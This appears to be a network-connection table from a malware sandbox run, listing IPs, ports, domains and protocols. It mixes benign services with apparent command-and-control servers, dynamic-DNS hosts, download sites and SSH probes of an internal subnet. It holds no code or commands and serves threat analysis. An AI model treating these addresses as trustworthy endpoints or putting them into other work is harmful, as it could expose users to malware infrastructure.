| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.19:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | 118.66.105.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.224.86.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.156.210.64.in-addr.arpa | udp |
| GB | 64.210.156.17:443 | media.trafficjunky.net | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| CN | 8.138.81.152:5555 | tcp | |
| HK | 154.12.82.11:808 | 154.12.82.11 | tcp |
| US | 8.8.8.8:53 | www.zhikey.com | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.5:443 | hw-cdn2.adtng.com | tcp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.82.12.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| HK | 47.79.66.210:80 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| ES | 47.62.190.226:8081 | 47.62.190.226 | tcp |
| HK | 43.132.12.146:9000 | 43.132.12.146 | tcp |
| US | 8.8.8.8:53 | paonancs.cn | udp |
| US | 8.8.8.8:53 | 226.190.62.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.12.132.43.in-addr.arpa | udp |
| CN | 121.43.104.75:8080 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| TH | 58.9.110.23:18063 | tcp | |
| CN | 180.140.124.53:60 | tcp | |
| CN | 61.131.3.86:9991 | tcp | |
| US | 8.8.8.8:53 | adf6.adf6.com | udp |
| US | 8.8.8.8:53 | download.innovare.no | udp |
| US | 8.8.8.8:53 | down.mvip8.ru | udp |
| US | 104.21.8.89:443 | down.mvip8.ru | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 89.8.21.104.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| CN | 39.100.254.136:80 | www.zhikey.com | tcp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| RU | 87.251.102.94:80 | 87.251.102.94 | tcp |
| US | 206.217.142.166:1234 | tcp | |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.17:443 | ht-cdn2.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.20:443 | ht-cdn2.adtng.com | tcp |
| ID | 103.123.98.86:8082 | 103.123.98.86 | tcp |
| GB | 89.197.154.115:80 | 89.197.154.115 | tcp |
| US | 8.8.8.8:53 | 94.102.251.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.154.197.89.in-addr.arpa | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 142.250.180.27:443 | storage.googleapis.com | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| DE | 172.105.66.118:8080 | 172-105-66-118.ip.linodeusercontent.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| HK | 8.210.218.210:80 | paonancs.cn | tcp |
| US | 8.8.8.8:53 | stdown.dinju.com | udp |
| US | 8.8.8.8:53 | klfs.synology.me | udp |
| CN | 101.226.27.117:80 | by.haory.cn | tcp |
| US | 8.8.8.8:53 | 86.98.123.103.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | sfa.com.ar | udp |
| KR | 27.102.130.169:801 | 27.102.130.169 | tcp |
| IN | 116.206.151.203:478 | 116.206.151.203 | tcp |
| HK | 43.132.13.252:9000 | 43.132.13.252 | tcp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | 210.218.210.8.in-addr.arpa | udp |
| US | 154.216.20.237:80 | 154.216.20.237 | tcp |
| RU | 185.215.113.205:8080 | 185.215.113.205 | tcp |
| NO | 217.149.124.92:80 | download.innovare.no | tcp |
| US | 104.21.67.89:80 | adf6.adf6.com | tcp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| CN | 47.104.173.216:9876 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| IT | 95.255.114.11:80 | 95.255.114.11 | tcp |
| US | 8.8.8.8:53 | 203.151.206.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.130.102.27.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.13.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.20.216.154.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 89.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.124.149.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.114.255.95.in-addr.arpa | udp |
| CN | 120.41.69.75:9096 | klfs.synology.me | tcp |
| CN | 61.240.220.214:80 | stdown.dinju.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 190.61.250.130:80 | sfa.com.ar | tcp |
| RU | 176.111.174.140:443 | tcp | |
| CN | 113.201.158.118:80 | mininews.kpzip.com | tcp |
| US | 8.8.8.8:53 | dcwblida.dz | udp |
| US | 8.8.8.8:53 | filelu.com | udp |
| US | 104.26.12.42:443 | filelu.com | tcp |
| US | 8.8.8.8:53 | 130.250.61.190.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.174.111.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.12.26.104.in-addr.arpa | udp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| GB | 216.58.212.227:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | alien-training.com | udp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| US | 8.8.8.8:53 | bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link | udp |
| CN | 42.56.81.104:80 | stdown.dinju.com | tcp |
| HK | 47.79.66.211:443 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | 3434.filelu.cloud | udp |
| US | 8.8.8.8:53 | quanlyphongnet.com | udp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 67.23.237.28:443 | 3434.filelu.cloud | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.66.79.47.in-addr.arpa | udp |
| HK | 219.73.22.64:8084 | 219.73.22.64 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 28.237.23.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.22.73.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| CN | 101.35.228.105:8888 | tcp | |
| NL | 83.87.76.41:80 | 83.87.76.41 | tcp |
| KR | 119.193.158.215:80 | 119.193.158.215 | tcp |
| US | 170.250.53.236:80 | 170.250.53.236 | tcp |
| CN | 117.50.194.20:80 | tcp | |
| RS | 79.101.0.33:443 | tcp | |
| US | 74.64.155.4:9090 | 74.64.155.4 | tcp |
| US | 8.8.8.8:53 | dz0nhlj1q8ac3.cloudfront.net | udp |
| US | 8.8.8.8:53 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | udp |
| IT | 217.58.56.138:8001 | 217.58.56.138 | tcp |
| DZ | 41.111.143.136:443 | dcwblida.dz | tcp |
| US | 166.167.172.14:8007 | 166.167.172.14 | tcp |
| HK | 47.79.66.211:80 | a19ccc1.oss-cn-hongkong.aliyuncs.com | tcp |
| CN | 47.94.196.131:80 | tcp | |
| RU | 176.113.115.203:80 | 176.113.115.203 | tcp |
| TH | 45.141.26.180:443 | tcp | |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| PL | 91.225.132.57:80 | 91.225.132.57 | tcp |
| US | 209.94.90.2:443 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | tcp |
| IE | 52.218.121.60:80 | alien-training.com | tcp |
| RU | 45.90.34.133:80 | pb.agnt.ru | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 89.197.154.115:7700 | tcp | |
| GB | 88.221.135.98:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 2.90.94.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.76.87.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.121.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.155.64.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.34.90.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.53.250.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.158.193.119.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.26.141.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.87.201.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.172.167.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.56.58.217.in-addr.arpa | udp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 180.117.160.2:80 | tcp | |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.101.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.143.111.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.132.225.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.135.221.88.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 122.51.183.116:1234 | tcp | |
| KR | 154.90.62.248:80 | 154.90.62.248 | tcp |
| NL | 18.239.63.181:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 209.94.90.2:443 | bafybeicnmx2fcaolinpdaiqjo7hgsourg3qzaxf57psdrbqic4qrm4pf3i.ipfs.dweb.link | tcp |
| CN | 116.169.181.197:80 | d.kpzip.com | tcp |
| US | 8.8.8.8:53 | 181.63.239.18.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 8.8.8.8:53 | ad.adf6.com | udp |
| US | 192.74.234.120:80 | ad.adf6.com | tcp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 8.8.8.8:53 | 248.62.90.154.in-addr.arpa | udp |
| US | 72.219.74.233:8080 | 72.219.74.233 | tcp |
| NL | 185.202.113.6:80 | 185.202.113.6 | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| CN | 47.98.177.117:8888 | tcp | |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 233.74.219.72.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | httpbin.org | udp |
| US | 18.208.8.205:443 | httpbin.org | tcp |
| US | 8.8.8.8:53 | 205.8.208.18.in-addr.arpa | udp |
| TH | 154.197.69.165:80 | 154.197.69.165 | tcp |
| CN | 52.83.32.119:8899 | tcp | |
| CN | 119.167.70.110:13332 | tcp | |
| MA | 102.53.15.54:80 | 102.53.15.54 | tcp |
| NL | 18.239.63.19:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| AU | 110.143.54.213:80 | 110.143.54.213 | tcp |
| US | 8.8.8.8:53 | utorrent-servers.xyz | udp |
| CN | 123.117.136.97:9000 | tcp | |
| CN | 118.178.133.241:65500 | tcp | |
| KR | 27.102.130.169:801 | 27.102.130.169 | tcp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 54.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.63.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.54.143.110.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| JP | 126.23.203.236:80 | softbank126023203236.bbtec.net | tcp |
| US | 8.8.8.8:53 | update.itopvpn.com | udp |
| N/A | 192.168.2.15:443 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| GB | 89.197.154.115:7700 | tcp | |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 89.175.186.155:80 | 89.175.186.155 | tcp |
| CN | 39.103.150.56:8888 | tcp | |
| US | 8.8.8.8:53 | www.opolis.io | udp |
| US | 8.8.8.8:53 | cs.go.kg | udp |
| NL | 194.26.192.76:8080 | 194.26.192.76 | tcp |
| US | 81.28.12.12:80 | utorrent-servers.xyz | tcp |
| PL | 152.199.23.214:80 | update.itopvpn.com | tcp |
| US | 8.8.8.8:53 | 214.23.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.155.105.34.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 101.226.27.115:80 | by.haory.cn | tcp |
| US | 204.9.23.122:85 | 204.9.23.122 | tcp |
| US | 8.8.8.8:53 | 12.12.28.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.23.9.204.in-addr.arpa | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| AT | 195.26.206.107:80 | www.opolis.io | tcp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| US | 8.8.8.8:53 | 7.167.126.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.186.175.89.in-addr.arpa | udp |
| TH | 58.137.135.190:8080 | tcp | |
| JP | 64.176.38.237:8139 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| US | 8.8.8.8:53 | 76.192.26.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.206.26.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.135.137.58.in-addr.arpa | udp |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| US | 8.8.8.8:53 | home.fvtekx5pt.top | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| CN | 123.6.40.224:80 | stdown.dinju.com | tcp |
| CN | 116.162.169.61:80 | mininews.kpzip.com | tcp |
| GB | 34.105.155.9:80 | home.fvtekx5pt.top | tcp |
| NL | 18.239.63.217:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| NL | 31.214.157.124:443 | tcp | |
| JP | 64.176.38.237:443 | tcp | |
| CN | 114.215.27.238:14417 | tcp | |
| TR | 5.26.97.52:80 | tcp | |
| CN | 119.91.25.19:8888 | tcp | |
| HK | 103.73.160.35:80 | tcp | |
| US | 104.21.8.89:80 | down.mvip8.ru | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 98.109.126.66:41798 | tcp | |
| US | 8.8.8.8:53 | znrq.zifwxq.cn | udp |
| VN | 14.243.221.170:2654 | tcp | |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| NL | 18.239.63.64:443 | dz0nhlj1q8ac3.cloudfront.net | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| TN | 41.230.16.223:8889 | tcp | |
| TH | 45.141.26.180:80 | tcp | |
| US | 8.8.8.8:53 | 230.188.166.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| KR | 211.220.36.213:80 | tcp | |
| CN | 218.12.76.159:80 | tcp | |
| RU | 83.149.17.194:80 | tcp | |
| US | 8.8.8.8:53 | sirault.be | udp |
| US | 8.8.8.8:53 | 194.17.149.83.in-addr.arpa | udp |
| CN | 36.250.242.248:80 | d.kpzip.com | tcp |
| CN | 61.160.192.121:80 | tcp | |
| US | 166.166.188.230:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 19.129.122.134.in-addr.arpa | udp |
| KR | 203.232.37.151:80 | tcp | |
| FR | 185.98.131.200:443 | sirault.be | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| HK | 134.122.129.19:80 | tcp | |
| CN | 60.29.43.10:8072 | tcp | |
| US | 8.8.8.8:53 | 64.78.102.34.in-addr.arpa | udp |
| CN | 123.6.40.224:80 | stdown.dinju.com | tcp |
| CN | 222.186.172.42:1000 | tcp | |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| US | 8.8.8.8:53 | udp | |
| CN | 222.186.172.42:1000 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | c3poolbat.oss-accelerate.aliyuncs.com | udp |
| HK | 154.12.82.11:808 | tcp | |
| DE | 136.243.104.235:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| HK | 154.12.82.11:7878 | tcp | |
| CN | 203.2.65.29:8086 | tcp | |
| CN | 112.33.27.73:443 | tcp | |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| CN | 101.226.27.114:80 | by.haory.cn | tcp |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| US | 8.8.8.8:53 | up.maolaoban.top | udp |
| US | 8.8.8.8:53 | www.ammyy.com | udp |
| DE | 136.243.18.118:80 | www.ammyy.com | tcp |
| DE | 136.243.18.118:443 | www.ammyy.com | tcp |
| US | 8.8.8.8:53 | cs.go.kg | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| US | 8.8.8.8:53 | 118.18.243.136.in-addr.arpa | udp |
| CN | 116.131.57.66:80 | stdown.dinju.com | tcp |
| CN | 58.144.248.111:80 | mininews.kpzip.com | tcp |
| CN | 121.40.100.23:12616 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| BE | 78.20.115.5:80 | 78.20.115.5 | tcp |
| US | 185.199.110.133:443 | media.githubusercontent.com | tcp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| CN | 122.228.207.55:80 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| US | 8.8.8.8:53 | cfs7.blog.daum.net | udp |
| US | 8.8.8.8:53 | download.haozip.com | udp |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.115.20.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.118.56.146.in-addr.arpa | udp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| KG | 176.126.167.7:80 | cs.go.kg | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| TH | 171.100.81.38:8080 | 171.100.81.38 | tcp |
| CN | 116.131.57.65:80 | stdown.dinju.com | tcp |
| TH | 58.9.110.23:18063 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | adv.gamer.kg | udp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| CN | 61.182.69.190:11111 | tcp | |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| KG | 176.126.167.7:80 | adv.gamer.kg | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 172.64.149.23:80 | tcp | |
| US | 8.8.8.8:53 | 172.41.208.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| DE | 185.232.59.135:80 | up.maolaoban.top | tcp |
| SG | 168.138.162.78:80 | 168.138.162.78 | tcp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 135.59.232.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.162.138.168.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| CN | 180.163.148.214:80 | download.haozip.com | tcp |
| KR | 121.53.202.238:80 | cfs7.blog.daum.net | tcp |
| CN | 61.160.192.114:80 | tcp | |
| CN | 120.52.95.247:80 | tcp | |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| VN | 103.110.33.188:80 | 103.110.33.188 | tcp |
| CN | 47.104.233.213:8072 | tcp | |
| US | 66.63.187.231:80 | 66.63.187.231 | tcp |
| DE | 185.254.96.92:80 | 185.254.96.92 | tcp |
| US | 8.8.8.8:53 | karoonpc.com | udp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| US | 8.8.8.8:53 | 238.202.53.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.96.254.185.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| VN | 103.77.173.146:6606 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | 188.33.110.103.in-addr.arpa | udp |
| RS | 79.101.0.33:80 | 79.101.0.33 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | cfs5.tistory.com | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| TH | 58.9.110.23:18063 | | tcp |
| GB | 89.197.154.115:7700 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| SE | 129.151.210.233:8000 | 129.151.210.233 | tcp |
| KR | 125.186.91.61:80 | 125.186.91.61 | tcp |
| US | 8.8.8.8:53 | elisans.novayonetim.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | 233.210.151.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.91.186.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CN | 112.124.28.233:5566 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | armanayegh.com | udp |
| CN | 223.247.198.16:14319 | | tcp |
| IR | 217.172.98.87:80 | karoonpc.com | tcp |
| MX | 148.231.192.3:80 | desquer.ens.uabc.mx | tcp |
| KR | 211.231.99.68:80 | cfs5.tistory.com | tcp |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.38.233:80 | | tcp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| HK | 154.12.82.11:808 | 154.12.82.11 | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| RU | 45.90.34.133:443 | pb.agnt.ru | tcp |
| TR | 176.53.14.120:80 | elisans.novayonetim.com | tcp |
| US | 8.8.8.8:53 | noithaticon.vn | udp |
| US | 8.8.8.8:53 | 87.98.172.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.192.231.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| N/A | 10.127.0.1:22 | | tcp |
| N/A | 10.127.0.10:22 | | tcp |
| GB | 8.208.41.172:80 | c3poolbat.oss-accelerate.aliyuncs.com | tcp |
| N/A | 10.127.0.2:22 | | tcp |
| N/A | 10.127.0.6:22 | | tcp |
| N/A | 10.127.0.7:22 | | tcp |
| N/A | 10.127.0.5:22 | | tcp |
| N/A | 10.127.0.4:22 | | tcp |
| N/A | 10.127.0.8:22 | | tcp |
| PT | 188.250.120.10:80 | 188.250.120.10 | tcp |
| US | 103.130.147.211:80 | 103.130.147.211 | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| CN | 8.130.82.167:80 | | tcp |
| US | 8.8.8.8:53 | monastery.mlnk.net | udp |
| US | 8.8.8.8:53 | api.52kkg.com | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 20.83.148.22:80 | | tcp |
| VN | 103.216.119.164:80 | quanlyphongnet.com | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 10.127.0.3:22 | | tcp |
| N/A | 10.127.0.9:22 | | tcp |
| DE | 116.203.8.137:443 | kotov.lol | tcp |
| US | 8.8.8.8:53 | 10.120.250.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.147.130.103.in-addr.arpa | udp |
